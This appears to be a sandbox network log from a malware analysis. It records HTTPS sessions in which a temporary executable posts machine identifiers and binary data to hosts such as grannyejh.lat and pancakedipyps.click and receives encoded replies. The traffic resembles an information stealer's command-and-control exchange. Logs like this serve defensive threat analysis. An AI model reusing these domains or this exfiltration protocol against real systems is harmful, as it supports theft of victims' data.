2024-12-19 09:12:27 UTC	1369	IN	Data Raw: 56 4a 72 70 43 7a 63 52 78 33 68 58 6e 47 50 4f 66 4d 52 6f 6b 38 62 78 4f 36 4e 6f 44 63 45 74 38 59 4c 4b 30 61 55 4d 36 66 36 46 6d 79 36 61 6f 45 47 4f 65 70 45 64 4d 55 71 75 51 54 72 54 68 75 48 74 63 76 71 64 55 43 7a 30 6b 4a 2f 43 37 51 36 71 2f 73 53 62 36 31 72 78 45 6c 79 37 45 35 37 6a 33 36 72 47 50 56 50 43 4d 71 76 6a 61 30 33 51 4f 79 4b 43 44 56 4f 6d 7a 4f 71 38 68 5a 67 74 6d 79 42 46 54 72 6b 54 33 66 48 49 37 49 4f 35 30 55 51 6a 37 58 66 75 44 67 45 75 73 5a 43 61 51 75 53 4c 2b 43 76 55 6b 6d 72 62 35 51 42 4d 61 4a 58 4e 64 5a 6d 75 67 53 69 45 46 65 45 75 4d 47 68 50 41 75 2f 7a 67 59 6e 52 70 34 35 72 76 34 65 5a 4c 42 72 6c 67 6f 33 36 6b 4a 79 79 69 71 77 43 2f 42 4c 46 73 54 34 6a 61 30 6a 51 4f 79 4b 4a 52 52 38 74 6e 65 2f Data Ascii: VJrpCzcRx3hXnGPOfMRok8bxO6NoDcEt8YLK0aUM6f6Fmy6aoEGOepEdMUquQTrThuHtcvqdUCz0kJ/C7Q6q/sSb61rxEly7E57j36rGPVPCMqvja03QOyKCDVOmzOq8hZgtmyBFTrkT3fHI7IO50UQj7XfuDgEusZCaQuSL+CvUkmrb5QBMaJXNdZmugSiEFeEuMGhPAu/zgYnRp45rv4eZLBrlgo36kJyyiqwC/BLFsT4ja0jQOyKJRR8tne/
2024-12-19 09:12:27 UTC	1369	IN	Data Raw: 74 30 78 46 39 79 7a 6b 74 30 78 47 61 69 52 76 73 49 45 49 6a 32 6c 65 6f 38 43 4c 7a 45 41 53 46 41 6d 54 75 68 2f 68 52 70 74 47 75 4c 41 44 76 6c 53 48 33 64 49 62 41 42 34 6b 4d 65 6a 72 4c 4d 6f 58 74 4f 39 4d 30 61 5a 78 50 56 42 61 66 68 41 6d 2f 38 63 38 6f 65 63 75 56 45 4f 35 64 6d 73 42 72 6a 54 51 57 41 75 63 61 34 4d 41 61 30 7a 78 41 67 52 35 38 34 6f 2f 38 66 62 37 52 2b 68 41 6f 79 38 46 70 39 78 43 6a 39 52 71 4a 50 44 38 54 75 6a 5a 73 73 43 2f 54 56 54 44 34 4c 6b 6a 76 67 72 31 4a 76 74 6d 47 4b 46 54 62 6b 51 33 6a 42 4c 72 67 41 35 6b 49 61 69 37 33 48 6f 7a 4d 41 75 38 38 4b 4c 45 32 62 4e 71 62 37 48 79 7a 79 4c 49 4d 66 63 72 6f 49 58 4e 55 72 75 78 2f 7a 66 52 43 45 35 34 32 31 64 52 6e 30 7a 51 35 6e 45 39 55 36 72 50 30 66 61 Data Ascii: t0xF9yzkt0xGaiRvsIEIj2leo8CLzEASFAmTuh/hRptGuLADvlSH3dIbAB4kMejrLMoXtO9M0aZxPVBafhAm/8c8oecuVEO5dmsBrjTQWAuca4MAa0zxAgR584o/8fb7R+hAoy8Fp9xCj9RqJPD8TujZssC/TVTD4Lkjvgr1JvtmGKFTbkQ3jBLrgA5kIai73HozMAu88KLE2bNqb7HyzyLIMfcroIXNUrux/zfRCE5421dRn0zQ5nE9U6rP0fa
2024-12-19 09:12:27 UTC	1369	IN	Data Raw: 48 4c 61 78 52 4f 38 67 71 2f 56 43 69 52 68 71 43 74 38 79 69 4d 77 43 79 77 41 59 6b 51 70 59 77 71 66 45 5a 62 37 5a 6a 67 77 45 32 34 6b 4e 38 77 53 43 34 41 2b 73 49 57 63 53 78 31 65 70 6a 51 4a 4c 70 45 44 56 35 6d 7a 53 37 74 77 30 69 70 53 79 44 43 33 4b 36 43 48 44 48 4b 61 38 4e 36 30 41 54 6a 62 62 4a 6f 44 59 48 74 4d 38 50 49 6b 2b 62 4d 36 66 33 48 6d 4f 37 5a 49 73 44 4d 75 30 49 4e 59 38 68 70 55 69 36 43 44 65 50 6f 4f 79 6b 4d 42 4c 30 31 55 77 2b 43 35 49 37 34 4b 39 53 59 72 56 74 6a 41 6b 2b 36 6b 78 70 7a 79 32 30 42 2b 4e 48 46 34 65 33 78 36 49 70 42 72 54 42 43 69 42 44 6b 54 6d 79 39 68 30 73 38 69 79 44 48 33 4b 36 43 45 72 5a 49 62 6f 48 6f 47 45 51 6e 37 66 48 71 54 41 4d 39 4e 56 4d 50 67 75 53 4f 2b 43 76 55 6d 47 77 59 59 Data Ascii: HLaxRO8gq/VCiRhqCt8yiMwCywAYkQpYwqfEZb7ZjgwE24kN8wSC4A+sIWcSx1epjQJLpEDV5mzS7tw0ipSyDC3K6CHDHKa8N60ATjbbJoDYHtM8PIk+bM6f3HmO7ZIsDMu0INY8hpUi6CDePoOykMBL01Uw+C5I74K9SYrVtjAk+6kxpzy20B+NHF4e3x6IpBrTBCiBDkTmy9h0s8iyDH3K6CErZIboHoGEQn7fHqTAM9NVMPguSO+CvUmGwYY
2024-12-19 09:12:27 UTC	1369	IN	Data Raw: 54 33 65 50 66 76 30 44 37 45 30 57 69 4c 7a 4b 70 43 6b 42 76 73 59 44 49 45 79 65 4a 61 76 6c 47 57 53 2f 59 6f 77 4f 4d 75 78 49 65 73 49 6d 2f 55 61 69 54 77 2f 45 37 6f 32 50 47 42 65 69 77 45 41 45 58 49 4d 39 70 2f 73 45 5a 37 31 76 6b 67 6f 69 6f 67 59 37 33 69 47 73 53 4c 70 65 42 35 4f 78 30 75 51 69 51 4c 50 47 51 6e 38 4c 6e 6a 69 75 2b 68 6c 6f 74 57 6d 4d 42 44 66 6e 51 6e 66 44 4a 37 55 42 36 45 30 53 67 72 7a 4f 70 44 51 42 75 4d 34 4c 4b 55 4c 56 65 65 44 77 43 69 7a 6b 4c 4c 49 58 4e 66 70 46 61 34 30 55 76 68 6e 7a 58 52 71 55 73 49 2b 46 4f 41 79 33 7a 77 55 33 43 34 70 35 75 62 63 56 59 50 77 30 78 41 63 32 37 6b 74 38 77 53 6d 77 42 2b 56 44 47 49 36 34 33 36 55 2b 43 4c 6a 43 44 7a 56 42 6e 79 57 70 2f 68 39 69 74 48 36 48 52 33 79 Data Ascii: T3ePfv0D7E0WiLzKpCkBvsYDIEyeJavlGWS/YowOMuxIesIm/UaiTw/E7o2PGBeiwEAEXIM9p/sEZ71vkgoiogY73iGsSLpeB5Ox0uQiQLPGQn8Lnjiu+hlotWmMBDfnQnfDJ7UB6E0SgrzOpDQBuM4LKULVeeDwCizkLLIXNfpFa40UvhnzXRqUsI+FOAy3zwU3C4p5ubcVYPw0xAc27kt8wSmwB+VDGI6436U+CLjCDzVBnyWp/h9itH6HR3y
2024-12-19 09:12:27 UTC	1369	IN	Data Raw: 53 75 38 43 2b 77 4b 4a 70 4b 37 33 61 6b 2b 42 34 72 30 44 43 42 66 6b 6a 6d 6d 39 31 49 69 2f 47 50 45 58 77 75 69 41 44 76 77 61 50 30 51 6f 68 42 58 73 62 58 44 70 44 77 57 70 59 63 68 4d 46 32 66 4c 4f 4c 52 46 58 32 31 65 6f 6b 56 63 71 77 49 66 59 39 2b 37 55 61 69 54 41 62 45 37 70 33 34 59 46 58 6e 6e 56 4a 31 56 4e 73 75 34 4f 46 53 4e 4f 34 69 78 42 56 79 75 67 67 38 7a 44 53 76 44 75 46 65 46 4d 4f 49 38 34 6f 77 46 72 58 48 43 53 74 31 71 79 4b 6a 2b 52 78 72 71 6e 33 45 53 58 4c 74 43 43 50 32 5a 76 56 49 33 51 5a 58 6e 50 61 56 36 67 34 44 75 73 51 46 4d 56 72 59 46 36 76 68 45 32 47 33 59 4d 59 47 50 2f 4a 50 4f 34 46 6d 75 30 69 36 47 46 6e 45 73 74 7a 71 59 31 44 6d 6b 56 64 30 48 4d 56 6c 76 37 6b 4c 4c 4b 6f 73 33 46 56 38 6f 6c 6f 37 Data Ascii: Su8C+wKJpK73ak+B4r0DCBfkjmm91Ii/GPEXwuiADvwaP0QohBXsbXDpDwWpYchMF2fLOLRFX21eokVcqwIfY9+7UaiTAbE7p34YFXnnVJ1VNsu4OFSNO4ixBVyugg8zDSvDuFeFMOI84owFrXHCSt1qyKj+Rxrqn3ESXLtCCP2ZvVI3QZXnPaV6g4DusQFMVrYF6vhE2G3YMYGP/JPO4Fmu0i6GFnEstzqY1DmkVd0HMVlv7kLLKos3FV8olo7
2024-12-19 09:12:27 UTC	1369	IN	Data Raw: 37 7a 42 53 4b 48 70 38 36 71 4d 45 44 36 69 67 52 6e 45 38 64 35 34 50 4d 44 4c 4f 51 38 31 6c 78 6e 73 52 38 72 6e 54 6e 7a 45 61 4a 65 56 39 7a 6b 67 2b 6f 70 51 4f 79 4b 52 53 52 5a 68 7a 47 6a 34 52 45 72 67 6c 4b 69 42 44 58 6b 53 33 58 59 4e 2f 38 6e 34 55 4d 62 69 4c 48 62 6c 41 55 56 74 38 51 4d 49 46 32 45 64 2b 36 33 48 53 7a 6b 56 63 51 57 4f 4f 55 45 4d 34 4d 33 72 67 62 70 58 68 44 45 69 59 50 71 49 30 44 73 69 6a 63 6b 52 5a 73 77 74 75 5a 66 53 72 39 72 67 67 51 38 39 56 6b 37 67 57 61 37 53 4c 6f 61 57 63 53 79 33 4f 70 6a 55 4f 61 52 56 33 51 63 78 57 57 2f 75 51 73 73 71 69 7a 63 56 48 79 69 57 6a 75 58 5a 76 6f 47 37 30 6b 55 69 72 58 66 75 44 30 44 6f 73 6c 46 47 58 57 77 4f 71 33 79 48 47 75 43 55 71 55 4e 49 75 39 48 66 50 45 59 69 Data Ascii: 7zBSKHp86qMED6igRnE8d54PMDLOQ81lxnsR8rnTnzEaJeV9zkg+opQOyKRSRZhzGj4RErglKiBDXkS3XYN/8n4UMbiLHblAUVt8QMIF2Ed+63HSzkVcQWOOUEM4M3rgbpXhDEiYPqI0DsijckRZswtuZfSr9rggQ89Vk7gWa7SLoaWcSy3OpjUOaRV3QcxWW/uQssqizcVHyiWjuXZvoG70kUirXfuD0DoslFGXWwOq3yHGuCUqUNIu9HfPEYi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	50180	172.67.179.109	443	3924	C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:15 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=E54DRXE9SCJZEVK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 29555 Host: grannyejh.lat
2024-12-19 09:12:15 UTC	15331	OUT	Data Raw: 2d 2d 45 35 34 44 52 58 45 39 53 43 4a 5a 45 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 45 35 34 44 52 58 45 39 53 43 4a 5a 45 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 35 34 44 52 58 45 39 53 43 4a 5a 45 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 45 35 34 44 52 Data Ascii: --E54DRXE9SCJZEVKContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--E54DRXE9SCJZEVKContent-Disposition: form-data; name="pid"1--E54DRXE9SCJZEVKContent-Disposition: form-data; name="lid"PsFKDg--pablo--E54DR
2024-12-19 09:12:15 UTC	14224	OUT	Data Raw: 5a 1a 87 f0 c2 a0 61 e1 bb b5 85 a4 a2 be b7 6e dc 5a 89 c9 6f 0d 37 33 24 7c f5 12 29 1e 50 51 4b c2 da c6 6e f9 6d 37 3e ba 07 00 b9 05 ae d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d 3b cf c3 df 7a 2f 15 6f 5e 8a 52 eb 8f 3d 5a b5 1b 48 4d 79 64 Data Ascii: ZanZo73$\|)PQKnm7>5OEK?6V,i<0egW\ro`#R\\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_\|x5mDom;z/o^R=ZHMyd
2024-12-19 09:12:29 UTC	1121	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o23ka77rvtqfbpnusbgeml85bd; expires=Mon, 14 Apr 2025 02:58:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0lFGKajWwRUrFRCj%2FXqRDcYVVMh4Yve3LueJ8qMiUVt1b4aL1toSpPP1qJ5sWX%2BjNwMojcbfwmdbMUmFNTAClewCtkJ7BENOWg0UuCV9Fy2tmzKqLuSjCnrF5CRHZnHx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4645177b217cb2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1807&rtt_var=687&sent=21&recv=33&lost=0&retrans=0&sent_bytes=2830&recv_bytes=30533&delivery_rate=1583514&cwnd=216&unsent_bytes=0&cid=4a97b0392dede779&ts=14884&x=0"
2024-12-19 09:12:29 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:12:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.6	50181	104.21.23.76	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:12:18 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 46 Host: pancakedipyps.click
2024-12-19 09:12:18 UTC	46	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
2024-12-19 09:12:31 UTC	1137	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:12:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=55hr0i37ujdnrp30ea6m5t3p09; expires=Mon, 14 Apr 2025 02:58:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FA49ML5ZH%2F%2F2CWtf%2BPNGVMQg2cnY2iFo8NlH0VdKUJrJidlRDsJ%2FwfDBnqYflikKemCurir8RzqiViw%2FQbWN3FvaNwhfmq53JkXwE7hkw4aX20c%2FgGIEAYEBXtb98MZkVyOx%2B2FO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46452aff854382-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1688&rtt_var=639&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=949&delivery_rate=1702623&cwnd=248&unsent_bytes=0&cid=a0ee0922999546db&ts=13520&x=0"
2024-12-19 09:12:31 UTC	232	IN	Data Raw: 34 39 31 63 0d 0a 79 53 4c 70 63 6a 7a 76 43 6b 76 54 64 31 37 58 4e 48 70 33 41 30 73 59 72 71 36 35 52 76 74 65 68 58 6b 34 4c 55 51 79 43 76 4b 79 41 4a 39 51 42 74 73 6d 61 61 41 53 66 4f 31 41 43 41 4a 6d 5a 7a 72 50 79 70 74 38 6e 54 2f 70 43 6c 30 42 5a 6b 52 6e 30 50 4e 45 69 42 35 50 69 69 5a 70 74 67 39 38 37 57 38 42 56 57 59 6c 4f 70 53 4d 33 43 79 5a 50 2b 6b 62 57 55 59 72 51 6d 61 52 6f 55 36 4f 47 6c 6d 4d 62 69 71 2f 47 6a 75 79 55 52 73 64 62 53 4a 31 78 73 4f 62 61 74 6b 37 2f 31 73 43 44 77 6c 58 66 70 4f 45 51 35 6f 5a 48 70 49 6d 4d 50 45 53 4d 50 55 4f 57 42 5a 6d 4b 58 54 49 79 74 49 75 6b 7a 62 68 47 6c 78 48 4e 46 74 73 6d 71 46 41 6a 52 74 54 68 58 6f 6e 74 52 Data Ascii: 491cySLpcjzvCkvTd17XNHp3A0sYrq65RvtehXk4LUQyCvKyAJ9QBtsmaaASfO1ACAJmZzrPypt8nT/pCl0BZkRn0PNEiB5PiiZptg987W8BVWYlOpSM3CyZP+kbWUYrQmaRoU6OGlmMbiq/GjuyURsdbSJ1xsObatk7/1sCDwlXfpOEQ5oZHpImMPESMPUOWBZmKXTIytIukzbhGlxHNFtsmqFAjRtThXontR
2024-12-19 09:12:31 UTC	1369	IN	Data Raw: 30 77 74 46 73 62 56 53 39 70 66 64 53 4d 67 32 54 4b 44 75 51 4b 53 31 6f 72 51 47 37 51 74 41 36 53 55 46 6d 42 4b 48 48 78 48 54 43 37 55 78 73 61 5a 69 68 36 33 73 50 62 4a 35 45 30 34 78 46 56 51 43 6c 65 59 70 65 6a 53 59 77 66 57 59 56 75 4a 72 4a 56 63 76 56 52 41 46 55 35 61 56 72 63 7a 39 67 77 6c 43 32 6e 42 42 52 57 5a 6c 64 6b 30 50 4d 41 6a 52 35 66 67 47 67 37 75 52 34 33 73 45 51 54 48 47 77 6b 65 73 48 47 31 43 65 5a 4f 2b 30 52 56 55 55 69 58 57 57 57 71 30 44 4c 58 68 36 4b 63 47 6e 70 56 52 2b 77 52 68 38 5a 64 32 74 41 6a 4e 4f 56 50 64 6b 37 36 31 73 43 44 79 35 56 61 35 4f 67 54 34 67 59 56 5a 39 6f 4f 37 63 59 4f 61 64 51 48 52 74 72 4b 6d 6a 47 77 74 30 6e 6b 44 66 75 48 6c 31 4c 5a 68 34 6f 6c 37 4d 41 30 31 42 2f 67 47 4d 6c 75 Data Ascii: 0wtFsbVS9pfdSMg2TKDuQKS1orQG7QtA6SUFmBKHHxHTC7UxsaZih63sPbJ5E04xFVQCleYpejSYwfWYVuJrJVcvVRAFU5aVrcz9gwlC2nBBRWZldk0PMAjR5fgGg7uR43sEQTHGwkesHG1CeZO+0RVUUiXWWWq0DLXh6KcGnpVR+wRh8Zd2tAjNOVPdk761sCDy5Va5OgT4gYVZ9oO7cYOadQHRtrKmjGwt0nkDfuHl1LZh4ol7MA01B/gGMlu
2024-12-19 09:12:31 UTC	1369	IN	Data Raw: 63 43 67 64 68 4a 57 6a 41 78 74 30 72 6c 44 43 6e 56 52 70 49 50 68 41 77 30 49 46 44 6e 78 4e 55 7a 31 30 71 76 78 73 37 6f 78 59 48 57 33 68 70 66 63 43 4d 67 32 53 55 50 65 38 64 53 45 41 72 55 32 61 65 70 45 57 45 47 46 36 4e 5a 53 79 31 48 6a 65 32 57 78 77 48 61 79 6c 79 79 63 33 52 4c 74 6c 79 70 78 78 43 44 33 34 51 57 59 65 67 41 72 34 54 55 49 4e 76 50 2f 45 4b 63 71 77 57 48 78 6b 68 63 54 72 42 78 4e 34 68 6c 6a 33 74 46 56 39 46 4b 6c 68 6d 6b 37 6c 50 6a 78 42 53 68 57 49 6b 76 78 45 30 76 46 30 54 45 32 45 6f 63 49 79 43 6d 79 4f 42 66 4c 39 62 62 6b 67 71 58 57 66 53 6e 6b 4f 46 48 6c 6d 62 4b 44 62 2f 44 48 79 79 57 6c 68 4e 49 53 56 7a 7a 4d 66 52 49 4a 6b 37 36 68 35 5a 53 43 56 64 62 35 71 6c 52 34 38 63 56 34 42 75 4b 62 59 52 4f 61 Data Ascii: cCgdhJWjAxt0rlDCnVRpIPhAw0IFDnxNUz10qvxs7oxYHW3hpfcCMg2SUPe8dSEArU2aepEWEGF6NZSy1Hje2WxwHaylyyc3RLtlypxxCD34QWYegAr4TUINvP/EKcqwWHxkhcTrBxN4hlj3tFV9FKlhmk7lPjxBShWIkvxE0vF0TE2EocIyCmyOBfL9bbkgqXWfSnkOFHlmbKDb/DHyyWlhNISVzzMfRIJk76h5ZSCVdb5qlR48cV4BuKbYROa
2024-12-19 09:12:31 UTC	1369	IN	Data Raw: 49 53 4a 50 77 74 71 62 4f 39 63 6c 70 78 78 57 44 33 34 51 59 5a 6d 35 54 6f 55 5a 55 34 74 67 4c 72 38 59 4e 37 4e 64 48 78 4a 6e 4a 48 4c 42 79 64 67 6c 6e 54 62 31 47 46 46 46 4b 31 6f 6f 33 75 74 48 6b 31 41 47 7a 55 38 6c 6d 41 55 6e 70 30 42 59 43 69 38 77 4f 73 76 41 6d 33 7a 5a 50 2b 67 53 56 55 63 75 58 32 65 55 70 55 61 4e 48 56 75 43 59 6a 75 35 47 7a 47 2b 57 52 4d 48 59 53 52 2b 77 4d 6a 54 4c 35 4e 38 71 56 74 64 56 32 59 49 4b 4b 57 6d 54 34 73 54 53 4d 31 33 5a 36 68 56 4f 37 6b 57 51 46 56 74 4a 33 72 44 77 4e 63 76 6b 54 33 72 46 56 31 4b 4c 31 68 67 67 71 70 45 67 78 46 51 67 6d 6b 74 74 42 41 34 73 6c 49 65 47 69 46 6e 4f 73 76 55 6d 33 7a 5a 45 38 41 75 47 47 34 63 45 48 66 65 73 67 43 4d 48 42 37 56 4b 43 57 79 47 54 53 36 55 42 45 Data Ascii: ISJPwtqbO9clpxxWD34QYZm5ToUZU4tgLr8YN7NdHxJnJHLBydglnTb1GFFFK1oo3utHk1AGzU8lmAUnp0BYCi8wOsvAm3zZP+gSVUcuX2eUpUaNHVuCYju5GzG+WRMHYSR+wMjTL5N8qVtdV2YIKKWmT4sTSM13Z6hVO7kWQFVtJ3rDwNcvkT3rFV1KL1hggqpEgxFQgmkttBA4slIeGiFnOsvUm3zZE8AuGG4cEHfesgCMHB7VKCWyGTS6UBE
2024-12-19 09:12:31 UTC	1369	IN	Data Raw: 6f 7a 47 30 43 43 61 4f 4f 49 55 57 30 34 67 51 6d 2b 5a 75 55 36 47 48 31 61 46 59 53 69 31 45 44 47 7a 57 68 49 55 5a 69 64 30 78 49 79 56 5a 4a 34 6b 70 30 4d 61 62 6a 5a 4c 65 6f 61 6d 59 59 59 66 48 70 49 6d 4d 50 45 53 4d 50 55 4f 57 42 78 7a 4c 58 66 65 78 64 77 71 6c 6a 2f 31 47 6c 64 45 4e 46 64 6e 6c 4b 78 4d 6a 52 39 59 6a 47 30 6a 76 52 49 35 76 6c 6b 55 56 53 39 70 66 64 53 4d 67 32 53 33 4e 2f 51 4d 57 55 45 74 52 6e 50 51 74 41 36 53 55 46 6d 42 4b 48 48 78 46 6a 65 2b 55 68 67 5a 59 53 31 33 7a 4e 37 55 49 35 34 31 37 41 6c 51 53 43 46 62 59 4a 75 6b 52 70 6b 63 55 4a 39 74 4f 36 4e 56 63 76 56 52 41 46 55 35 61 55 7a 4c 33 4d 73 6e 32 77 33 78 47 45 78 45 4b 31 77 6f 6a 2b 56 5a 79 78 64 53 7a 54 42 70 74 78 6f 31 74 6c 6b 5a 48 47 30 6b Data Ascii: ozG0CCaOOIUW04gQm+ZuU6GH1aFYSi1EDGzWhIUZid0xIyVZJ4kp0MabjZLeoamYYYfHpImMPESMPUOWBxzLXfexdwqlj/1GldENFdnlKxMjR9YjG0jvRI5vlkUVS9pfdSMg2S3N/QMWUEtRnPQtA6SUFmBKHHxFje+UhgZYS13zN7UI5417AlQSCFbYJukRpkcUJ9tO6NVcvVRAFU5aUzL3Msn2w3xGExEK1woj+VZyxdSzTBptxo1tlkZHG0k
2024-12-19 09:12:31 UTC	1369	IN	Data Raw: 4e 6b 6f 54 66 70 4b 56 6c 55 5a 6b 38 6d 69 65 74 48 68 31 41 47 7a 57 73 75 73 68 51 32 76 46 6f 58 45 6d 55 37 63 4d 76 65 32 69 57 53 4d 65 73 62 56 30 49 73 55 57 47 64 70 30 32 4d 46 31 47 49 4b 47 66 78 45 69 54 31 44 6c 67 30 62 43 4a 32 6c 35 61 62 4f 39 63 6c 70 78 78 57 44 33 34 51 61 4a 71 75 53 6f 59 54 55 59 35 36 4b 4c 63 48 50 4c 68 63 43 68 39 71 4c 48 66 42 77 64 67 69 6e 7a 66 72 43 56 4e 50 4a 56 73 6f 33 75 74 48 6b 31 41 47 7a 55 73 2b 70 78 38 37 75 55 41 54 46 47 49 2f 64 39 79 4d 6c 57 53 49 4f 2f 5a 62 41 6c 6b 32 52 32 2b 50 35 56 6e 4c 46 31 4c 4e 4d 47 6d 33 48 44 71 79 55 42 59 48 5a 43 39 31 77 38 58 53 49 4a 45 2f 35 78 39 65 53 43 4e 54 5a 4a 75 73 51 34 51 55 56 34 4e 68 4a 76 46 62 66 4c 4a 4f 57 45 30 68 43 47 48 50 77 Data Ascii: NkoTfpKVlUZk8mietHh1AGzWsushQ2vFoXEmU7cMve2iWSMesbV0IsUWGdp02MF1GIKGfxEiT1Dlg0bCJ2l5abO9clpxxWD34QaJquSoYTUY56KLcHPLhcCh9qLHfBwdginzfrCVNPJVso3utHk1AGzUs+px87uUATFGI/d9yMlWSIO/ZbAlk2R2+P5VnLF1LNMGm3HDqyUBYHZC91w8XSIJE/5x9eSCNTZJusQ4QUV4NhJvFbfLJOWE0hCGHPw
2024-12-19 09:12:31 UTC	1369	IN	Data Raw: 75 35 42 49 61 41 57 5a 58 63 4e 44 7a 41 4b 73 62 53 49 68 76 50 2f 4d 67 50 37 74 59 48 77 4d 68 4e 6b 57 43 6a 4e 51 2b 32 57 54 65 41 68 70 49 4b 68 41 77 30 4c 35 48 69 78 64 45 6d 32 38 6c 6f 42 34 78 75 58 51 58 45 6e 63 71 64 63 2f 64 30 6d 69 53 4d 61 64 56 47 6b 67 2b 45 44 44 51 68 45 65 64 45 33 47 4f 65 53 44 78 57 33 79 79 51 46 68 4e 49 52 63 36 33 73 2f 4c 4a 35 59 74 32 56 73 43 56 68 67 51 59 34 61 73 55 49 67 47 56 59 42 6b 4f 49 39 56 5a 4f 45 45 53 6b 63 7a 65 32 57 4d 30 2b 52 71 32 54 32 6e 51 32 4e 57 5a 6b 59 6f 79 50 6b 4f 79 77 49 65 31 53 68 75 73 67 63 75 73 31 55 4f 46 69 59 58 52 4f 76 61 30 53 4f 4a 4f 2f 41 55 47 67 46 6d 58 79 6a 49 6b 67 43 43 46 30 57 63 66 69 53 68 45 6e 79 4b 47 46 67 4e 49 58 45 36 2b 63 2f 56 4b 70 Data Ascii: u5BIaAWZXcNDzAKsbSIhvP/MgP7tYHwMhNkWCjNQ+2WTeAhpIKhAw0L5HixdEm28loB4xuXQXEncqdc/d0miSMadVGkg+EDDQhEedE3GOeSDxW3yyQFhNIRc63s/LJ5Yt2VsCVhgQY4asUIgGVYBkOI9VZOEESkcze2WM0+Rq2T2nQ2NWZkYoyPkOywIe1Shusgcus1UOFiYXROva0SOJO/AUGgFmXyjIkgCCF0WcfiShEnyKGFgNIXE6+c/VKp
